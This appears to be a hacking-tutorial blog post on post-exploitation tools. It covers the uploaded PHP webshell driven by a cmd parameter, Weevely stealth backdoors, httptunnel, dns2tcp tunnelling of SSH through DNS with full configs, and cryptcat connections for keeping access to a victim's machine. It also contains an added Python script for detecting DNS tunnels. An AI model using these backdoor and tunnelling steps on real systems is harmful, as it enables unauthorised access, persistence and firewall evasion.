Hacking Articles Part 26


To open Webshells, go to the terminal and type "cd /usr/share/webshells"

You can see that they are divided into folders according to the programming language: asp, aspx, cfm, jsp, perl, and php. So, if you enter the php folder, you will see all the webshells for PHP pages.

To use the shell on a web server, upload it and then request "/simple-backdoor.php" at the URL of the webshell, passing the command through the cmd parameter like in the picture below.


Weevely

-What is weevely? It is a PHP web shell that simulates a telnet-like connection. It is also a tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free hosted ones.

To use Weevely, go to the terminal and type "weevely". To generate the shell, just type "weevely generate password pathoffile". After uploading the web shell, we can connect to the server and run commands using the command "weevely URL password".

http-tunnel

-Here we are again, in the HTTP portion. This one creates a bidirectional virtual data stream tunneled in HTTP requests. The requests can be sent through an HTTP proxy if desired. This can also be useful for users behind restrictive firewalls: if WWW access is allowed through an HTTP proxy, it is possible to use http-tunnel together with telnet or PPP to connect to a computer outside the firewall.

We just need to create a tunnel server by typing the following command:

httptunnel_server -h

Then, on the client side you need to type "httptunnel_client -h", and both sides will start to accept connections.

dns2tcp

-This one sounds familiar, right? We have already tackled the DNS and TCP topics in the previous articles. Dns2tcp is a tunneling tool that helps pass TCP traffic through DNS traffic, which means UDP port 53.

To start using this one, just type "dns2tcpd" and the usage will be printed when the program starts.

On the server side, enter these commands to create the configuration file and start the daemon (each option goes on its own line; "your domain" and "secretkey" are the values you replace with your own):

#cat >>.dns2tcpdrc <<END
listen = 53
port = 53
user = nobody
chroot = /root/dns2tcp
pid_file = /var/run/dns2tcp.pid
domain = your domain
key = secretkey
resources = ssh:127.0.0.1:22
END

#dns2tcpd -f .dns2tcpdrc

While on the client side, type these commands (the domain and key must match the server's configuration):

# cat >>.dns2tcprc <<END
domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END

# dns2tcpc -f .dns2tcprc

# ssh root@localhost -p 7891 -D 7076

And tunneling will start with the commands above.
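From the defender's side, a dns2tcp session is visible in resolver logs as a burst of TXT (or KEY) queries to one zone whose leftmost labels are long and random-looking, because that is where the encoded TCP payload travels. The following Python check is an added example, not from the original article; it runs over a constructed sample log (the record format, the sample names and the thresholds are assumptions, and the zone cut uses the last two labels instead of a public-suffix list).

```python
import math
from collections import defaultdict

# Constructed resolver query log, one "<client> <qtype> <qname>" per line. The TXT
# queries to *.tun.example.net imitate a dns2tcp session; the rest is normal traffic.
SAMPLE_LOG = """\
10.0.0.5 A www.wikipedia.org
10.0.0.5 AAAA www.wikipedia.org
10.0.0.7 TXT 5p5k8x2ha9n3mqzv7bc4l1fdgs6wty0e.r2.tun.example.net
10.0.0.7 TXT 9mdf3k7qzb1vw5xn8a0ch2lp6s4ygte1.r2.tun.example.net
10.0.0.7 TXT zx3c9v1b7n5m2a8s4d6f0g1h3j5k7l9q.r2.tun.example.net
10.0.0.7 TXT 7q2w9e4r6t8y0u1i3o5p1a3s5d7f9g2h.r2.tun.example.net
10.0.0.7 TXT c5v7b9n1m3q2w4e6r8t0y1u3i5o7p9a2.r2.tun.example.net
10.0.0.5 A mail.google.com
"""

def shannon_entropy(s):
    """Bits per character of s; encoded payload labels score near 5, words near 3."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def registered_zone(qname, depth=2):
    """Crude zone cut: last `depth` labels (assumption: no public-suffix list)."""
    return ".".join(qname.rstrip(".").split(".")[-depth:])

def find_dns_tunnel_candidates(log_text, min_queries=5, min_label_len=20,
                               min_entropy=3.5, tunnel_types=("TXT", "KEY")):
    """Zones with enough volume, long high-entropy leftmost labels and mostly
    payload-carrying record types (dns2tcp requests TXT or KEY records)."""
    stats = defaultdict(lambda: {"n": 0, "len": 0, "ent": 0.0, "typ": 0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        _client, qtype, qname = parts
        label = qname.split(".")[0]          # leftmost label carries the data
        s = stats[registered_zone(qname)]
        s["n"] += 1
        s["len"] += len(label)
        s["ent"] += shannon_entropy(label)
        s["typ"] += qtype in tunnel_types
    flagged = []
    for zone, s in stats.items():
        if (s["n"] >= min_queries and s["len"] / s["n"] >= min_label_len
                and s["ent"] / s["n"] >= min_entropy and s["typ"] / s["n"] >= 0.5):
            flagged.append(zone)
    return sorted(flagged)
```

Tune the thresholds against a baseline of your own resolver's traffic; CDNs and some security products also generate long labels, so treat a hit as a lead to investigate rather than proof of a tunnel.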

Cryptcat

-This is the last tool that we can use to maintain access to other computers or machines. It is just like Netcat, and allows you to make TCP and UDP connections with the victim's machine in an encrypted way.

To start a server to listen for a connection, just type:

cryptcat -l -p port -n

Where,

· -l stands for listening to a connection.

· -p stands for port number parameter.

· -n stands for not doing name resolution (numeric addresses only).

On the client side, the connection command you need to use is "cryptcat IPofServer PortofServer" (Example: "cryptcat 127.0.0.1 78").

Wow, that's it guys. I will be honest with all of you that even I got a weird feeling when typing this article on my laptop, I felt some dizziness and it got me crazy hehe, but I hope you learned something today and please keep on following this group and subscribe for more articles that we will bring to you.
